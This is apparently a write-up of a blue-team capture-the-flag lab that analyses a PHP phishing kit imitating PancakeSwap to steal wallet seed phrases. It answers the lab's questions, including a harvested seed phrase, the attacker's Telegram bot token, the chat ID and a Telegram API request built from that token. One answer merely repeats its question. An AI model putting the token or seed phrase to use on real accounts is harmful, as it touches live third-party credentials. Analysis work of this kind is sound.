# GrabThePhisher Write-up

:الحمد لله والصلاة والسلام على رسول الله وعلى آله وصحبه أما بعد

## Instructions: <a href="#id-6876" id="id-6876"></a>

* Uncompress the lab (pass: [**cyberdefenders.org**](http://cyberdefenders.org/) **)**

## Scenario: <a href="#id-7eb8" id="id-7eb8"></a>

An attacker compromised a server and impersonated <https://pancakeswap.finance/>, a decentralized exchange native to BNB Chain, to host a phishing kit at <https://apankewk.soup.xyz/mainpage.php>. The attacker set it as an open directory with the file name “pankewk.zip”.

Provided the phishing kit, you as a soc analyst are requested to analyze it and do your threat intel homework.

Link: <https://cyberdefenders.org/blueteam-ctf-challenges/grabthephisher/>

Medium: <https://medium.com/@GLITCHGC/grabthephisher-write-up-b99849f18a73>

***

## Questions: <a href="#id-67cf" id="id-67cf"></a>

### 1. Which wallet is used for asking the seed phrase? <a href="#id-8ffd" id="id-8ffd"></a>

After Download the zip file you will notice an index.html file open it

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*ru1QEdSae5RmfOswNiqvpA.png" alt="" height="234" width="700"><figcaption></figcaption></figure>

The answer will be the first wallet, and the answer depends on the folder named after it in the zip file

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*TGCs5Loi9ALRBwM21hQ7DQ.png" alt="" height="401" width="700"><figcaption></figcaption></figure>

> **Answer: Metamask**

***

### 2. What is the file name that has the code for the phishing kit? <a href="#id-99d8" id="id-99d8"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*NzOZrXJJerTX5oUeaJ9sww.png" alt="" height="140" width="700"><figcaption></figcaption></figure>

> **Answer: What is the file name that has the code for the phishing kit?**

***

### 3. In which language was the kit written? <a href="#e546" id="e546"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*NzOZrXJJerTX5oUeaJ9sww.png" alt="" height="140" width="700"><figcaption></figcaption></figure>

> **Answer: PHP**

***

### 4. What service does the kit use to retrieve the victim’s machine information? <a href="#id-7a52" id="id-7a52"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*oyiRc9rprqrqA9JjQ9cuBw.png" alt="" height="350" width="700"><figcaption></figcaption></figure>

> **Answer: Sypex Geo**

***

### 5. How many seed phrases were already collected? <a href="#id-4793" id="id-4793"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:674/1*3woCBDYjhvPirH_NtjNGaA.png" alt="" height="138" width="674"><figcaption></figcaption></figure>

> **Answer: 3**

***

### 6. Write down the seed phrase of the most recent phishing incident? <a href="#d6e2" id="d6e2"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:674/1*3woCBDYjhvPirH_NtjNGaA.png" alt="" height="138" width="674"><figcaption></figcaption></figure>

> **Answer: father also recycle embody balance concert mechanic believe owner pair muffin hockey**

***

### 7. Which medium had been used for credential dumping? <a href="#id-0be7" id="id-0be7"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*srdErlrRRkv5zmMjNAnVbA.png" alt="" height="394" width="700"><figcaption></figcaption></figure>

> **Answer: Telegram**

***

### 8. What is the token for the channel? <a href="#id-7554" id="id-7554"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*QsCD4CyML4NJ3Hx6t-3KUg.png" alt="" height="394" width="700"><figcaption></figcaption></figure>

> **Answer: 5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10**

***

### 9. What is the chat ID of the phisher’s channel? <a href="#id-6c6e" id="id-6c6e"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*NBfFOw79e7vBg-L3Okd8uA.png" alt="" height="394" width="700"><figcaption></figcaption></figure>

> **Answer: 5442785564**

***

### 10. What are the allies of the phish kit developer? <a href="#id-9b60" id="id-9b60"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:700/1*rhOaN1Jx8_V6cFIdjE6zrQ.png" alt="" height="394" width="700"><figcaption></figcaption></figure>

> **Answer: j1j1b1s\@m3r0**

***

### 11. What is the full name of the Phish Actor? <a href="#id-7e68" id="id-7e68"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:369/1*3jQm-u_ogkgY-nBZynvK3A.png" alt="" height="251" width="369"><figcaption></figcaption></figure>

Request the api to get the answers “[https://api.telegram.org/bot5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10/getChat?chat\_id=5442785564”](https://api.telegram.org/bot5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10/getChat?chat_id=5442785564%E2%80%9D)

> **Answer: Marcus Aurelius**

***

### 12. What is the username of the Phish Actor? <a href="#id-748d" id="id-748d"></a>

<figure><img src="https://miro.medium.com/v2/resize:fit:470/1*Wtds2CdvTkJGO33Gir_Gpw.png" alt="" height="264" width="470"><figcaption></figcaption></figure>

> **Answer: pumpkinboii**

***

## You Can Find me Here! <a href="#d59b" id="d59b"></a>

Blog: [https://g1it0h.gitbook.io/glitch](https://g1it0h.gitbook.io/glitch/writeups/cyberdefenders-labs/openwire-write-up)/

Linkedin: <https://www.linkedin.com/in/glitchgc/>

Facebook: <https://www.facebook.com/GLITC.GC/>

Tryhackme: <https://tryhackme.com/p/GLITCH1GC>